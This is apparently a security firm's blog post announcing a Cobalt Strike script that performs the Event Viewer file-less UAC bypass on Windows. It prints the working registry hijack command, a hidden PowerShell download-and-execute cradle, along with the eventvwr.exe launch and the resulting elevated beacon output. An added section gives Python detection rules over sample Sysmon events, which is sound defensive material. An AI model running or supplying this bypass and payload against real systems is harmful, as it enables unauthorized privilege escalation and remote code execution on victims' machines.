Eventvwr File-less UAC Bypass CNA

Matt Nelson recently released a very useful, file-less UAC bypass using Event Viewer, which was quickly implemented into a Metasploit module by @TheColonial. Following this, we decided to release our own implementation in the form of a Cobalt Strike CNA script. The current default UAC bypass in Cobalt Strike relies on DLL hijacking and drops a temporary DLL artefact to disk, as shown in the following:

[code lang="bash"]
beacon> bypassuac
[*] Tasked beacon to spawn windows/beacon_smb/bind_pipe (127.0.0.1:6667) in a high integrity process
[+] host called home, sent: 111759 bytes
[+] received output:
[*] Wrote hijack DLL to 'C:\Users\vysec\AppData\Local\Temp\0a80.dll'
[+] Privileged file copy success! C:\WINDOWS\System32\NTWDBLIB.dll
[+] C:\WINDOWS\System32\cliconfg.exe ran and exited.
[*] Cleanup successful
[/code]

Bypassuac-eventvwr was created as a way to easily utilise the EventVwr UAC bypass technique while maintaining good opsec: nothing is written to disk, so the method should be AV friendly.

The CNA script currently performs the following:

  • Write registry path hijack
  • Execute eventvwr.exe
  • When eventvwr.exe executes, the hijack will be called
  • If SMB is used, linking is performed to the new beacon
  • Delete registry path hijack
  • Enjoy elevated beacon

An example usage is shown below:

[code lang="bash"]
beacon> bypassuac-eventvwr "smb"
[*] Tasked Beacon to BypassUAC to windows/beacon_smb/bind_pipe (127.0.0.1:6667) via Eventvwr Fileless UAC Bypass
[*] Adding Registry Key
[*] reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8390/'))
[*] Tasked beacon to run: reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8390/'))
[*] Spawning Eventvwr.exe
[*] Tasked beacon to run: eventvwr.exe
[+] host called home, sent: 3253 bytes
[*] Deleting Registry Key
[*] reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
[*] Tasked beacon to run: reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
[+] received output:
The operation completed successfully.
[+] host called home, sent: 196761 bytes
[+] established link to child beacon: 192.168.114.134
[+] received output:
The operation completed successfully.
[/code]
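As a defensive counterpart to the procedure above, the following is an added example and is not part of the original post or the MDSec script: detection logic run over constructed Sysmon-style Event ID 13 (RegistryEvent SetValue) and Event ID 1 (ProcessCreate) records, flagging any write to the mscfile handler in a per-user hive and any child of eventvwr.exe other than mmc.exe. The field names follow Sysmon's schema; the event records, paths and SID are constructed sample data.

```python
import re

# Key the CNA hijacks: Windows consults the per-user mscfile registration before
# the machine-wide one, and no normal installer puts an mscfile handler in HKCU.
HIJACK_KEY = re.compile(r"\\Software\\Classes\\mscfile\\shell\\open\\command", re.I)
# eventvwr.exe is only a launcher; legitimately its sole child is mmc.exe.
EXPECTED_CHILD = "\\mmc.exe"


def check_registry_event(ev):
    """Alert on a Sysmon Event ID 13 (RegistryEvent SetValue) to the hijacked key."""
    if ev.get("EventID") == 13 and HIJACK_KEY.search(ev.get("TargetObject", "")):
        return f"mscfile handler written by {ev.get('Image')}: {ev.get('Details')}"
    return None


def check_process_event(ev):
    """Alert on a Sysmon Event ID 1 where eventvwr.exe spawns anything but mmc.exe."""
    if ev.get("EventID") != 1:
        return None
    parent, child = ev.get("ParentImage", "").lower(), ev.get("Image", "").lower()
    if parent.endswith("\\eventvwr.exe") and not child.endswith(EXPECTED_CHILD):
        return f"eventvwr.exe spawned {child}: {ev.get('CommandLine', '')}"
    return None


def detect(events):
    """Run both checks over an event stream and return the alerts in order."""
    alerts = []
    for ev in events:
        for check in (check_registry_event, check_process_event):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events (Sysmon field names) mirroring the console output above.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\mscfile\shell\open\command\(Default)",
     "Details": "cmd.exe /c powershell -nop -w hidden -c IEX (...)"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",  # benign per-user setting
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden -c ..."},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",  # the normal hand-off
     "Image": r"C:\Windows\System32\mmc.exe", "CommandLine": "mmc.exe eventvwr.msc"},
]
```

Running `detect(SAMPLE_EVENTS)` yields two alerts, one for the reg.exe write and one for the cmd.exe child; the benign registry write and the mmc.exe hand-off produce none.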

A brief demonstration of how to use this module is shown below:

You can download Bypassuac-eventvwr from the @MDSecLabs GitHub.

This blog post was written by @vysecurity.

Written by MDSec Research
